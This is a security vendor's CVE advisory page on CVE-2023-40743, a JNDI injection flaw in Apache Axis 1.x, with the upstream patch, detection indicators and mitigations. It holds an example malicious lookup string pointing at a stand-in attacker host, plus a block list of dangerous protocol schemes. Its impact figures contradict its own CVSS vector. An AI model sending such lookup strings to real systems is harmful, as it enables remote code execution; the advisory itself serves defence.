The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2023-40743

CVE-2023-40743: Apache Axis 1.x SSRF Vulnerability

CVE-2023-40743 is a server-side request forgery vulnerability in Apache Axis 1.x that enables DoS, SSRF, and RCE attacks through unsafe ServiceFactory.getService lookups. This article covers technical details, risks, and mitigations.

Published: February 11, 2026

CVE-2023-40743 Overview

CVE-2023-40743 is a critical vulnerability affecting Apache Axis 1.x, an end-of-life (EOL) SOAP engine. When integrating Apache Axis 1.x in an application, the ServiceFactory.getService API method allows potentially dangerous lookup mechanisms such as LDAP, RMI, and JNDI. When untrusted input is passed to this method, it can expose the application to Denial of Service (DoS), Server-Side Request Forgery (SSRF), and potentially Remote Code Execution (RCE) attacks.

Critical Impact

This vulnerability in unsupported software allows attackers to leverage JNDI injection techniques through the ServiceFactory.getService API, potentially achieving remote code execution on vulnerable systems. Apache Axis 1.x is end-of-life with no official patch release planned.

Affected Products

  • Apache Axis 1.x (all versions)
  • Applications integrating Apache Axis 1.x with untrusted input to ServiceFactory.getService
  • Legacy Java SOAP applications using the Axis 1 framework

Discovery Timeline

  • September 5, 2023 - CVE CVE-2023-40743 published to NVD
  • February 13, 2025 - Last updated in NVD database

Technical Details for CVE-2023-40743

Vulnerability Analysis

This vulnerability exists in Apache Axis 1.x's ServiceFactory.getService method, which performs JNDI lookups without adequately filtering dangerous protocols. When an application passes user-controlled input to this method, an attacker can craft malicious JNDI lookup strings that trigger connections to attacker-controlled servers via protocols like LDAP, RMI, or DNS.

The attack mechanism is similar to other JNDI injection vulnerabilities such as Log4Shell. An attacker can supply a malicious JNDI reference string (e.g., ldap://attacker.com/malicious) that causes the vulnerable application to connect to an attacker-controlled server. The remote server can then respond with a serialized Java object or codebase reference that, when processed, leads to arbitrary code execution on the target system.

The lack of input validation in the ServiceFactory.getService method allows dangerous protocols to be processed, enabling multiple attack scenarios including denial of service through resource exhaustion, SSRF attacks to access internal resources, and full remote code execution through malicious object deserialization.

Root Cause

The root cause is improper input validation (CWE-20) and failure to neutralize special elements in output used by a downstream component (CWE-75). The ServiceFactory.getService method accepts JNDI names without filtering out dangerous protocol schemes such as LDAP, RMI, JMS, JMX, JRMP, JAVA, and DNS. This allows attackers to inject malicious lookup references that trigger connections to external or internal resources under attacker control.

Attack Vector

The attack vector is network-based and requires no authentication or user interaction. An attacker who can supply input to the ServiceFactory.getService method can exploit this vulnerability by:

  1. Identifying an application endpoint that passes user input to the vulnerable API
  2. Crafting a malicious JNDI lookup string targeting protocols like LDAP or RMI
  3. Setting up an attacker-controlled server to respond with malicious payloads
  4. Triggering the JNDI lookup to achieve DoS, SSRF, or RCE depending on the environment

The official patch filters out dangerous protocols by checking the JNDI name for unsafe scheme prefixes:

java
         
         if (context != null) {
             String name = (String)environment.get("jndiName");
+
+	    if(name!=null && (name.toUpperCase().indexOf("LDAP")!=-1 || name.toUpperCase().indexOf("RMI")!=-1 || name.toUpperCase().indexOf("JMS")!=-1 || name.toUpperCase().indexOf("JMX")!=-1) || name.toUpperCase().indexOf("JRMP")!=-1 || name.toUpperCase().indexOf("JAVA")!=-1 || name.toUpperCase().indexOf("DNS")!=-1)  {
+	        return null;
+            }
             if (name == null) {
                 name = "axisServiceName";
             }

Source: GitHub Commit Update

Detection Methods for CVE-2023-40743

Indicators of Compromise

  • Outbound network connections from application servers to unexpected LDAP, RMI, or other JNDI-related ports (e.g., LDAP port 389/636, RMI port 1099)
  • Application logs containing JNDI lookup strings with suspicious protocol prefixes (ldap://, rmi://, jndi://)
  • Unusual DNS queries from application servers to external domains containing JNDI-related patterns
  • Presence of unfamiliar Java class files or serialized objects on affected systems

Detection Strategies

  • Monitor application logs for ServiceFactory.getService invocations with external or suspicious JNDI references
  • Implement network egress filtering and alerting for unexpected outbound connections to LDAP/RMI services
  • Deploy application-level runtime protection to detect and block JNDI injection attempts
  • Scan codebases and dependencies for Apache Axis 1.x usage with software composition analysis tools

Monitoring Recommendations

  • Enable verbose logging for JNDI operations and monitor for anomalous lookup patterns
  • Configure network intrusion detection systems to alert on JNDI-related protocol traffic from application servers
  • Monitor for class loading events from remote sources which may indicate successful exploitation
  • Track DNS resolution logs for patterns consistent with JNDI injection attacks (e.g., lookups containing encoded payloads)

How to Mitigate CVE-2023-40743

Immediate Actions Required

  • Audit application code to identify any usage of ServiceFactory.getService with untrusted or unsanitized input
  • Migrate from Apache Axis 1.x to Apache Axis 2/Java or another actively maintained SOAP engine
  • Apply input validation and sanitization for any data passed to JNDI-related APIs
  • Implement network-level controls to restrict outbound connections from application servers to trusted destinations only

Patch Information

Apache Axis 1 has reached end-of-life and the Apache Axis project does not expect to create an official Axis 1.x release fixing this problem. However, a community patch is available at the GitHub Commit Update. Organizations using Apache Axis 1.x should apply this patch manually or migrate to a supported SOAP engine. Additional guidance is available in the Apache Mailing List Thread. Debian LTS users can reference the Debian LTS Announcement for distribution-specific updates.

Workarounds

  • Review and sanitize all input passed to ServiceFactory.getService to ensure no untrusted data reaches the API
  • Block dangerous JNDI protocol schemes (LDAP, RMI, JMS, JMX, JRMP, JAVA, DNS) at the application or network level
  • Implement Java Security Manager policies to restrict JNDI lookups to trusted contexts only
  • Use network segmentation to isolate legacy Axis 1.x applications from sensitive internal resources
bash
# Example: Block outbound LDAP and RMI traffic from application servers using iptables
iptables -A OUTPUT -p tcp --dport 389 -j DROP
iptables -A OUTPUT -p tcp --dport 636 -j DROP
iptables -A OUTPUT -p tcp --dport 1099 -j DROP

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeSSRF

  • Vendor/TechApache Axis

  • SeverityCRITICAL

  • CVSS Score9.8

  • EPSS Probability0.99%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityHigh
  • CWE References
  • CWE-20

  • CWE-75
  • Technical References
  • Debian LTS Announcement
  • Vendor Resources
  • GitHub Commit Update

  • Apache Mailing List Thread
  • Related CVEs
  • CVE-2023-51441: Apache Axis SSRF Vulnerability
Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English